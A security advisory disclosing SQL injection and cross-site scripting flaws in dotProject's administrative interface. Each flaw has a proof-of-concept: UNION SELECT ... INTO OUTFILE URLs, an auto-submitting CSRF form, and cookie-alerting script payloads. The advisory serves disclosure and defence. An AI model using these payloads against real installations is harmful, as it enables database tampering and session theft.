High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in dotProject, which can be exploited to perform SQL injection and cross-site scripting (XSS) attacks.
1) SQL Injection in dotProject: CVE-2012-5701
High-Tech Bridge Security Research Lab has discovered multiple SQL injection vulnerabilities in dotProject administrative interface. A remote authenticated administrator can execute arbitrary SQL commands in application's database. These vulnerabilities could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to cross-site request forgery attacks. In order to do so an attacker should trick the logged-in administrator to visit a web page with CSRF exploit.
1.1 Vulnerability exists due to insufficient sanitation of input passed via the "search_string" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, this PoC code will create a /tmp/file.txt file, containing MySQL server version:
http://[host]/index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20 version(),2,3,4,5,6,7,8,9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202
The second PoC demonstrates exploitation of the same vulnerability via CSRF vector:
<form action="http://[host]/index.php" method="GET" name="F1">
<input type="hidden" name="m" value="contacts">
<input type="hidden" name="search_string" value="0') UNION SELECT version(),2,3,4,5,6,7,8,9,10,11 INTO OUTFILE '/tmp/file.txt' -- 2">
</form>
<script>
document.F1.Submit();
</script>
1.2 Vulnerability exists due to insufficient sanitation of input passed via the "where" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, this PoC code will create a /tmp/file.txt file, containing MySQL server version:
http://[host]/index.php?m=contacts&where=%27%29%20UNION%20SELECT%20version() ,2,3,4,5,6,7,8,9,10,11%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
1.3 Vulnerability exists due to insufficient sanitation of input passed via the "dept_id" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, this PoC code will create a /tmp/file.txt file, containing MySQL server version:
http://[host]/index.php?m=departments&dept_id=%27%20UNION%20SELECT%20version %28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
Successful exploitation of vulnerabilities 1.1 – 1.3 requires that "magic_quotes_gpc" is set to "off" in php.ini.
1.4 Vulnerability exists due to insufficient sanitation of input passed via the "project_id" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, this PoC code will create a /tmp/file.txt file, containing MySQL server version:
http://[host]/?m=projects&update_project_status=1&project_status=1&project_i d[]=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt %27%20--%202
1.5 Vulnerability exists due to insufficient sanitation of input passed via the "company_id" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, this PoC code will create a /tmp/file.txt file, containing MySQL server version:
http://[host]/?m=system&a=billingcode&company_id=0%20UNION%20SELECT%201,2,3, 4,5,6%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
2) Cross-Site Scripting (XSS) in dotProject: CVE-2012-5702
High-Tech Bridge Security Research Lab has discovered multiple cross-site scripting vulnerabilities in dotProject administrative interface.
2.1 Input sanitation error was found in the index.php script when handling the "callback" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of an affected website.
The following PoC demonstrates the vulnerability:
http://[host]/?m=public&a=color_selector&callback=%3C/script%3E%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E
2.2 Input sanitation error was found in the index.php script when handling the "field" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of an affected website.
The following PoC demonstrates the vulnerability:
http://[host]/?m=public&a=date_format&field=%3C/script%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
2.3 Input sanitation error was found in the index.php script when handling the "company_name" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of an affected website.
The following PoC demonstrates the vulnerability:
http://[host]/index.php?m=contacts&a=addedit&contact_id=0&company_id=1&compa ny_name=%22%20onmouseover=%22javascript:alert%28document.cookie%29%22
2.4 Input sanitation error was found in the index.php script when handling the "date" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of an affected website.
The following PoC demonstrates the vulnerability:
http://[host]/index.php?a=day_view&date=%22%20onmouseover=%22javascript:aler t%28document.cookie%29%22
|
